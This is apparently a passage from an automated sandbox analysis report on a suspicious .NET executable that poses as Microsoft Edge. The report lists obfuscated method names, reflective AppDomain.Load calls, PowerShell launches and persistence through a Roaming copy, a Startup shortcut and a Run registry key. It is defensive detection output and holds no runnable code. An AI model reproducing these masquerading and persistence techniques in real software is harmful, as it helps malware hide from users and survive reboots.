              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: yvnqfo914EySOHca3mPggRH9hWzbGQ9srmuVp8UADz4mCRGGmR7K6V0v0OHk0yvSNqFiThI3mXpKf5bCQYeMDWrp System.AppDomain.Load(byte[])
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: yvnqfo914EySOHca3mPggRH9hWzbGQ9srmuVp8UADz4mCRGGmR7K6V0v0OHk0yvSNqFiThI3mXpKf5bCQYeMDWrp
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: cQRHu4A1JGPAbtFj4cchJe7gNguKVqA95hp4xT5TrPCVY72UKZMiZdpHpESCNruTjpmuxNlG7MQHkSRKLTRMIpVg System.AppDomain.Load(byte[])
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: yvnqfo914EySOHca3mPggRH9hWzbGQ9srmuVp8UADz4mCRGGmR7K6V0v0OHk0yvSNqFiThI3mXpKf5bCQYeMDWrp System.AppDomain.Load(byte[])
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs.Net Code: yvnqfo914EySOHca3mPggRH9hWzbGQ9srmuVp8UADz4mCRGGmR7K6V0v0OHk0yvSNqFiThI3mXpKf5bCQYeMDWrp
              Source: C:\Users\user\Desktop\msedge_visual_render.exe Code function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848DFD2A5 pushad ; iretd 2_2_00007FF848DFD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F109B8 push E95ABCD0h; ret 2_2_00007FF848F109C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F109E8 push E85D925Dh; ret 2_2_00007FF848F109F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848FE2316 push 8B485F94h; iretd 2_2_00007FF848FE231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848E1D2A5 pushad ; iretd 5_2_00007FF848E1D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848F319DB pushad ; ret 5_2_00007FF848F319E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848F300BD pushad ; iretd 5_2_00007FF848F300C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF849002316 push 8B485F92h; iretd 5_2_00007FF84900231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF848E2D2A5 pushad ; iretd 8_2_00007FF848E2D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF848F400BD pushad ; iretd 8_2_00007FF848F400C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FF849012316 push 8B485F91h; iretd 8_2_00007FF84901231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF848E1D2A5 pushad ; iretd 10_2_00007FF848E1D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF848F300BD pushad ; iretd 10_2_00007FF848F300C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF849002316 push 8B485F92h; iretd 10_2_00007FF84900231B
              Source: C:\Users\user\AppData\Roaming\msedge.exe Code function: 13_2_00007FF848F100BD pushad ; iretd 13_2_00007FF848F100C1
              Source: C:\Users\user\AppData\Roaming\msedge.exe Code function: 14_2_00007FF848F300BD pushad ; iretd 14_2_00007FF848F300C1
              Source: msedge_visual_render.exe, XS8m6YBpCDtRV9a.cs High entropy of concatenated method names: 'QORk6FeTXwZ9716', 'wN9NyIKsmyfBfUy', '_8QBfeg8ryVGnesb', 'DDbKNkiqqqgWA78u7Vr3V458lG62TgyZV', 'kX5MFny8vZbMX0xWiZrT1Nv1OhaCLiPIT', '_0cKrkfebjff0OGygOSToekxy8Ca0QpY9w', '_8uAi1bwPbkQNQdZaZFMB0j1wzWOqMYTHe', 'nbnsVMrCpaXWBnfHnHT51epF54lGjI4Gx', 'pQCo9HEfcOShncVCZHqBX3OTImpLYXlxS', 'y5cHyYugrPJExYOKojLsRczoNGZW5kZmM'
              Source: msedge_visual_render.exe, bg5pDCbiKesxiwN0NyC6BFvciFfpHEL1JU4v5uGDqleamvdbu7PjKyTcWLOZ8XQXgK9USGgsC.cs High entropy of concatenated method names: 'ryHT6xzaSnQFmjDvK1GBISkpIY6IhsC2rRI5dOBqEp0JbSrvSZfhXuV64WPB8Iv7j0l0PNGGT', 'uX7nZbyYDybTmHCqbeGGxERl9YNqlqkit', '_1Ow4dhVcewJoUuI5za4KqQKK5Q6ATpybt', '_8OuzLCVmLJRJlYZh5pUeJn6SQKdKfopGc', 'ADrRLKgeIOjheVBkdt4xfO0tE8DgbT2iI'
              Source: msedge_visual_render.exe, elLkHgumj8zMt6dU8JYf1G6IkwDQivZKUFJjfEVDTWpzx37RFuDS3IKMnbII5ilgpL3mjMM2z20DN5pmWdXDGhgB.cs High entropy of concatenated method names: 'RNr9A1bT8ZRsrKuCiQHPtnOjL0JarLxTw9MISlOHVuSNi7HHtmuMXt8AXPkwEvecougipcLkLjSv53YZlFG0v8wC', 'vIBC9uIrXh1zc5tmvzVebHpPs4lje2CS7', 'FWiY4Lgjmoxo2EW46N97O5P336VrGVb8b', '_35U3Qh5uQpf9cK3VJ8RxX3jBBC6FLhX29', 'UbLaffdcJC6J7jxJPnuLblqYEHVAReTNB'
              Source: msedge_visual_render.exe, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.cs High entropy of concatenated method names: '_6IJeoj42CcbPMqQtejRCcNKqlJHi46D1EilEgnIXenRrhSZ0N1FbgAr', 'OviqWHBSPGVvs7wdErJr5aJfG9gMoZdKOdvop6aS7ua0SLwN84o1Exq', 'OGKY6H43n9Lp6ntUDx8X43MQZzhcCrR3qLByvD1PEJR0LuBkr38UqIQ', 'bZHPA2qZ242r2miJv88K76GVJKAt7eqUVWjso8eRPzuPUgyVzJxMR46', 'gPGWuRrm6E8zexZzCf9DKB5vdMtY4dB8sy4LDlYehV3LxYysATmajM5', 'JPue3vPYV69oIqXy4tBgk26K2UfvumhcVhzySdj9drDSjR2QAXrOHH2', 'h4BqWId2Pf8ePwPczkCi9zyYrthp2RRilHFzNyYeVWfB1dKuxHw1R2o', 'XuOQNrjXQavI1sJYkomP7XHjR3AcQOWbdaTOhfvXOCDvFPES1VIKYPS', 'h7O8rpmtQZZUXff5Ms5GfBzHUzGgGYPIh6yrWzYzhaqh2fPIw8wvtMd', '_5wAT4n3FXgmUwJtqVo2pfiJbZyqizdsjmKXjD3cDlpNFSuJRNaeKQzM'
              Source: msedge_visual_render.exe, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.cs High entropy of concatenated method names: '_0lWdbUJQ6MglkepIJPo1igjSuT8XUrwQAD8dJkIkUGj5jPYatYC3YqkOE3tJaeFmovQTNThOR', 'VvV5YPwAnq9i2w7pyR7Pl01qwbKo0dmhbCoY8HdU77TT7QfPZWz4FFztIcNn4BClcJmVHIlKF', 'NZSQwCK1G4YRGL4iJWhzxpyTjve62ni7hmeW563hTvwekCYooJzFvfAcj34N72sStwINJI0tT', 'wHXdyFElOwljVWE0iGf0RhRjSl3MQJqbQkOuGPEd6D95u0uXbGjZfZrF6LF9or1LICFlRux76', 'gM52mAwgmBEExAWHKJXFiyEOB4ObDUYvgsOqcfNFmnfxCUjK3RfRD0y8A3r5xmzxQN8i8s8I5', '_4abJqWhsmdNe2iOLeVeCHc94UCz6CA5JeGMfMzUtyDoA0lr4voXJOdZsPktwXcWXNWGDG9ddk', 'Lum1wvVRcUcJbhuJp7gWv6DsLTtr3HztccQgCN7WbBrMcMN9huRjnd50zetQhOxnU8RP78yRK', 'kktFoQYwvGGqMZCH4sBISRADyLZhkRzphm2g3A0ou0gbb1UwRmBnZhwLvM0BKzjVtItPL7S2a', '_7yOzgXxQE7D9An5amaYVO2ik1ocVGy2UFXIhWcH2d7S5D98ET1FHmyUYjAnNM9dZ2SbjCeUfT', 'Be82WIappoOQbTIAX4EXRAYIvI5i7Y6kBBpJxUVmoeZHFW884hAMj6T6VnRhRQNU9FPznq08j'
              Source: msedge_visual_render.exe, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs High entropy of concatenated method names: 'BCCnncdvmVX47gZzxP8w0x9Y9P3btDxMr5xSPrmNPVJkYlZCXi7ePWocB5bH2hLDdd73PzEQlVkJsEfxGuFlSuoF', 'cQRHu4A1JGPAbtFj4cchJe7gNguKVqA95hp4xT5TrPCVY72UKZMiZdpHpESCNruTjpmuxNlG7MQHkSRKLTRMIpVg', 'BiLxYcuMcoz8dx5bJmCogyHdNwQL3jQi1Xp9o7zZUFBOmRtbzRLKBy9gKfRSPVIyqTezkmGnBv532YqcvWnLlCCx', 'R7r4nq35gOBFXVYXTskbl8p76O1VpQVYx8lNTJ8NAiHrVvB918oA3sfYL1QzLev0DIc9nIbsv5GFKfu5XNjNOYRt', '_5xbN9z6Km7cH7SmA2CvyYIa407kly6mXxfA6PEhTRvBbb6XfnDOzth10LGXoYILIjFNwPo4iBDJgfIrl2ib8BFOq', 'DDDScvAymfUhNMJZFBKJjv1bfcNkDjlgzS36WrJT7AmDIJTCvYvQchHpd4HKuOdGwTGZNzko6uk05Xcbftw6Uzpu', 'kvdG3gowgiKcdpj3EbxJtWNbk7oAdTFqco5lZhXSp0BTuPVseceAEEh2dmiXTJmMbFDKlyhV4e5ZGgLLk1nepFEu', 'nDfRvOB9IJ6eM4U9FaVEwa7zb3Mu9dUxuaRDacwRCm3fzATJu2epc8ox0enZbSfvM7OVxnVsrNWDrwQqrjAmJLue', '_8jPApqv3fRmMqj9UhkELlHhWawKuQnxQUJigZa7k3tq1r8gxXm8fHQkwFsDo1kmizbobCjyuHCXMYqMDtdrp0b1f', 'Oae67RW5zNjkwJk4zz0HqDABs5R0W0pedT3Ntheid3zBHb25hyF2IjDtGk6THWH1VRs82fGyoyPa7xHij5dFSl3R'
              Source: msedge_visual_render.exe, LppdMUzjYTZSer81jQFRniukvyXOkU8JBTx5lIvFRSb0NWWPM2a9flL.cs High entropy of concatenated method names: 'PpyKkExu10BwO6sBYJLo5oom2zvFMGCJhuEJMPDDzOxIOnJbwAxjpGB', '_86yImf4Ml9VIXlfFwnJAeQAXxmXlKIwXbrPCUk8I5VxV1VWkbAMmwjx', '_0BaOKmQ80p0DRdABpNfDbm5SUoF3Dppa0OP2NuHnUanu1Apagm9OqLw', 'LX5yXb09v3Jv1ahFy07ftzcRFQcVyQhmF23aF9ZLcRSOqOaXcQGxcHU', 'mHndYDhqBfehwpe', 'r6ZinNvwh0BZuwQ2TCdUufdP1ewaNpWJtXGRj9xsaZz9jQGt', 'nY8QQmsCmYEDjs2adun1QT4rP6zjXlkijr5LTUUxMyINPHUr', 'AYh2ryE7BjbV7KpmdNJOuNXhuCmiK950PAGQxPtnNZ8WxbHt', 'EsS7bPMXuxh0pqpINdoOWvE9ypoM4SaRExmVFnhhFTelPugp', 'p4fU8Af3S3ugu6AOV3p4ScfAxDJ4JSyfvlZTJdRGbwO0rrYd'
              Source: msedge_visual_render.exe, TxKfvxZAkfcU37RTEH4kQoKfGaF9jpeLtGmpJ8JcbPiR5ZbdkrM4z96BzFxl8usuwMFLkv3XU.cs High entropy of concatenated method names: 'SJchA07n93Re2S8jfRZtYcMWEhHVRB2V74anStBqOT37oDL1cgwcUAcZI1mPL2vcLDOu60Twg', '_8U6oFig8dpHDZh8XT4Evg3qeWDvxFFNmtBZHDdtTUPLMoXpjT1St0g4Io4qJj6hQYDMOC3FdC', 'nGw8KGcs0mwpxtpSjOnak5rU9DecElCDMXhYhYS15lIgKO2FXp2cJa7X14tJHNe40X8tBe58r', 'ehPloLi8Rt4aLlq7Klh5ZgfQOkp8UQBp9CMc9E4Unoo5vd3mfzELwy4Ok5gAXgEEAyjEvK3eW', 'OAHwHlBQqXZhzF271Ynq9h46neAH0cOPW', '_5djsbM1Qbpm4USL9iAq2k9gfkpmK2pXbN', 'UVLuAbgKcp3wJRmNVFxLZ9rDJQ2UmYdY4', '_76b3OVkOyyN6L2UVOv1EzuThJi0X6SD3z', 'GzOoSx78EzMrmHn2CoSZYXpA0L46XKUd5', 'ef96gJB6ZOTNTsOulT9lxWil68FXbcLUI'
              Source: msedge.exe.0.dr, XS8m6YBpCDtRV9a.cs High entropy of concatenated method names: 'QORk6FeTXwZ9716', 'wN9NyIKsmyfBfUy', '_8QBfeg8ryVGnesb', 'DDbKNkiqqqgWA78u7Vr3V458lG62TgyZV', 'kX5MFny8vZbMX0xWiZrT1Nv1OhaCLiPIT', '_0cKrkfebjff0OGygOSToekxy8Ca0QpY9w', '_8uAi1bwPbkQNQdZaZFMB0j1wzWOqMYTHe', 'nbnsVMrCpaXWBnfHnHT51epF54lGjI4Gx', 'pQCo9HEfcOShncVCZHqBX3OTImpLYXlxS', 'y5cHyYugrPJExYOKojLsRczoNGZW5kZmM'
              Source: msedge.exe.0.dr, bg5pDCbiKesxiwN0NyC6BFvciFfpHEL1JU4v5uGDqleamvdbu7PjKyTcWLOZ8XQXgK9USGgsC.cs High entropy of concatenated method names: 'ryHT6xzaSnQFmjDvK1GBISkpIY6IhsC2rRI5dOBqEp0JbSrvSZfhXuV64WPB8Iv7j0l0PNGGT', 'uX7nZbyYDybTmHCqbeGGxERl9YNqlqkit', '_1Ow4dhVcewJoUuI5za4KqQKK5Q6ATpybt', '_8OuzLCVmLJRJlYZh5pUeJn6SQKdKfopGc', 'ADrRLKgeIOjheVBkdt4xfO0tE8DgbT2iI'
              Source: msedge.exe.0.dr, elLkHgumj8zMt6dU8JYf1G6IkwDQivZKUFJjfEVDTWpzx37RFuDS3IKMnbII5ilgpL3mjMM2z20DN5pmWdXDGhgB.cs High entropy of concatenated method names: 'RNr9A1bT8ZRsrKuCiQHPtnOjL0JarLxTw9MISlOHVuSNi7HHtmuMXt8AXPkwEvecougipcLkLjSv53YZlFG0v8wC', 'vIBC9uIrXh1zc5tmvzVebHpPs4lje2CS7', 'FWiY4Lgjmoxo2EW46N97O5P336VrGVb8b', '_35U3Qh5uQpf9cK3VJ8RxX3jBBC6FLhX29', 'UbLaffdcJC6J7jxJPnuLblqYEHVAReTNB'
              Source: msedge.exe.0.dr, gUeJiTeUFSlCFEA4RMwxWrX8e0AP00tNPBK3Dwxp4LwfuASRUP0W1uO.cs High entropy of concatenated method names: '_6IJeoj42CcbPMqQtejRCcNKqlJHi46D1EilEgnIXenRrhSZ0N1FbgAr', 'OviqWHBSPGVvs7wdErJr5aJfG9gMoZdKOdvop6aS7ua0SLwN84o1Exq', 'OGKY6H43n9Lp6ntUDx8X43MQZzhcCrR3qLByvD1PEJR0LuBkr38UqIQ', 'bZHPA2qZ242r2miJv88K76GVJKAt7eqUVWjso8eRPzuPUgyVzJxMR46', 'gPGWuRrm6E8zexZzCf9DKB5vdMtY4dB8sy4LDlYehV3LxYysATmajM5', 'JPue3vPYV69oIqXy4tBgk26K2UfvumhcVhzySdj9drDSjR2QAXrOHH2', 'h4BqWId2Pf8ePwPczkCi9zyYrthp2RRilHFzNyYeVWfB1dKuxHw1R2o', 'XuOQNrjXQavI1sJYkomP7XHjR3AcQOWbdaTOhfvXOCDvFPES1VIKYPS', 'h7O8rpmtQZZUXff5Ms5GfBzHUzGgGYPIh6yrWzYzhaqh2fPIw8wvtMd', '_5wAT4n3FXgmUwJtqVo2pfiJbZyqizdsjmKXjD3cDlpNFSuJRNaeKQzM'
              Source: msedge.exe.0.dr, 2c2OZMa7wIHjbQyGjzc9vbqhoSyzYYwSaHycpYduXsi9Kun78wGkFvt1I9Kue9An4GYq2jn0n.cs High entropy of concatenated method names: '_0lWdbUJQ6MglkepIJPo1igjSuT8XUrwQAD8dJkIkUGj5jPYatYC3YqkOE3tJaeFmovQTNThOR', 'VvV5YPwAnq9i2w7pyR7Pl01qwbKo0dmhbCoY8HdU77TT7QfPZWz4FFztIcNn4BClcJmVHIlKF', 'NZSQwCK1G4YRGL4iJWhzxpyTjve62ni7hmeW563hTvwekCYooJzFvfAcj34N72sStwINJI0tT', 'wHXdyFElOwljVWE0iGf0RhRjSl3MQJqbQkOuGPEd6D95u0uXbGjZfZrF6LF9or1LICFlRux76', 'gM52mAwgmBEExAWHKJXFiyEOB4ObDUYvgsOqcfNFmnfxCUjK3RfRD0y8A3r5xmzxQN8i8s8I5', '_4abJqWhsmdNe2iOLeVeCHc94UCz6CA5JeGMfMzUtyDoA0lr4voXJOdZsPktwXcWXNWGDG9ddk', 'Lum1wvVRcUcJbhuJp7gWv6DsLTtr3HztccQgCN7WbBrMcMN9huRjnd50zetQhOxnU8RP78yRK', 'kktFoQYwvGGqMZCH4sBISRADyLZhkRzphm2g3A0ou0gbb1UwRmBnZhwLvM0BKzjVtItPL7S2a', '_7yOzgXxQE7D9An5amaYVO2ik1ocVGy2UFXIhWcH2d7S5D98ET1FHmyUYjAnNM9dZ2SbjCeUfT', 'Be82WIappoOQbTIAX4EXRAYIvI5i7Y6kBBpJxUVmoeZHFW884hAMj6T6VnRhRQNU9FPznq08j'
              Source: msedge.exe.0.dr, gdw2cqoX4TszY141RCuGz0juBedMNvOtAMnO7KvHhK7yEC6KroNireLJQgUwUKUiQOOee8BzIcunbCmM57IW0R13.cs High entropy of concatenated method names: 'BCCnncdvmVX47gZzxP8w0x9Y9P3btDxMr5xSPrmNPVJkYlZCXi7ePWocB5bH2hLDdd73PzEQlVkJsEfxGuFlSuoF', 'cQRHu4A1JGPAbtFj4cchJe7gNguKVqA95hp4xT5TrPCVY72UKZMiZdpHpESCNruTjpmuxNlG7MQHkSRKLTRMIpVg', 'BiLxYcuMcoz8dx5bJmCogyHdNwQL3jQi1Xp9o7zZUFBOmRtbzRLKBy9gKfRSPVIyqTezkmGnBv532YqcvWnLlCCx', 'R7r4nq35gOBFXVYXTskbl8p76O1VpQVYx8lNTJ8NAiHrVvB918oA3sfYL1QzLev0DIc9nIbsv5GFKfu5XNjNOYRt', '_5xbN9z6Km7cH7SmA2CvyYIa407kly6mXxfA6PEhTRvBbb6XfnDOzth10LGXoYILIjFNwPo4iBDJgfIrl2ib8BFOq', 'DDDScvAymfUhNMJZFBKJjv1bfcNkDjlgzS36WrJT7AmDIJTCvYvQchHpd4HKuOdGwTGZNzko6uk05Xcbftw6Uzpu', 'kvdG3gowgiKcdpj3EbxJtWNbk7oAdTFqco5lZhXSp0BTuPVseceAEEh2dmiXTJmMbFDKlyhV4e5ZGgLLk1nepFEu', 'nDfRvOB9IJ6eM4U9FaVEwa7zb3Mu9dUxuaRDacwRCm3fzATJu2epc8ox0enZbSfvM7OVxnVsrNWDrwQqrjAmJLue', '_8jPApqv3fRmMqj9UhkELlHhWawKuQnxQUJigZa7k3tq1r8gxXm8fHQkwFsDo1kmizbobCjyuHCXMYqMDtdrp0b1f', 'Oae67RW5zNjkwJk4zz0HqDABs5R0W0pedT3Ntheid3zBHb25hyF2IjDtGk6THWH1VRs82fGyoyPa7xHij5dFSl3R'
              Source: msedge.exe.0.dr, LppdMUzjYTZSer81jQFRniukvyXOkU8JBTx5lIvFRSb0NWWPM2a9flL.cs High entropy of concatenated method names: 'PpyKkExu10BwO6sBYJLo5oom2zvFMGCJhuEJMPDDzOxIOnJbwAxjpGB', '_86yImf4Ml9VIXlfFwnJAeQAXxmXlKIwXbrPCUk8I5VxV1VWkbAMmwjx', '_0BaOKmQ80p0DRdABpNfDbm5SUoF3Dppa0OP2NuHnUanu1Apagm9OqLw', 'LX5yXb09v3Jv1ahFy07ftzcRFQcVyQhmF23aF9ZLcRSOqOaXcQGxcHU', 'mHndYDhqBfehwpe', 'r6ZinNvwh0BZuwQ2TCdUufdP1ewaNpWJtXGRj9xsaZz9jQGt', 'nY8QQmsCmYEDjs2adun1QT4rP6zjXlkijr5LTUUxMyINPHUr', 'AYh2ryE7BjbV7KpmdNJOuNXhuCmiK950PAGQxPtnNZ8WxbHt', 'EsS7bPMXuxh0pqpINdoOWvE9ypoM4SaRExmVFnhhFTelPugp', 'p4fU8Af3S3ugu6AOV3p4ScfAxDJ4JSyfvlZTJdRGbwO0rrYd'
              Source: msedge.exe.0.dr, TxKfvxZAkfcU37RTEH4kQoKfGaF9jpeLtGmpJ8JcbPiR5ZbdkrM4z96BzFxl8usuwMFLkv3XU.cs High entropy of concatenated method names: 'SJchA07n93Re2S8jfRZtYcMWEhHVRB2V74anStBqOT37oDL1cgwcUAcZI1mPL2vcLDOu60Twg', '_8U6oFig8dpHDZh8XT4Evg3qeWDvxFFNmtBZHDdtTUPLMoXpjT1St0g4Io4qJj6hQYDMOC3FdC', 'nGw8KGcs0mwpxtpSjOnak5rU9DecElCDMXhYhYS15lIgKO2FXp2cJa7X14tJHNe40X8tBe58r', 'ehPloLi8Rt4aLlq7Klh5ZgfQOkp8UQBp9CMc9E4Unoo5vd3mfzELwy4Ok5gAXgEEAyjEvK3eW', 'OAHwHlBQqXZhzF271Ynq9h46neAH0cOPW', '_5djsbM1Qbpm4USL9iAq2k9gfkpmK2pXbN', 'UVLuAbgKcp3wJRmNVFxLZ9rDJQ2UmYdY4', '_76b3OVkOyyN6L2UVOv1EzuThJi0X6SD3z', 'GzOoSx78EzMrmHn2CoSZYXpA0L46XKUd5', 'ef96gJB6ZOTNTsOulT9lxWil68FXbcLUI'
              Source: C:\Users\user\Desktop\msedge_visual_render.exe File created: C:\Users\user\AppData\Roaming\msedge.exe
              Source: C:\Users\user\Desktop\msedge_visual_render.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
              Source: C:\Users\user\Desktop\msedge_visual_render.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\msedge_visual_render.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
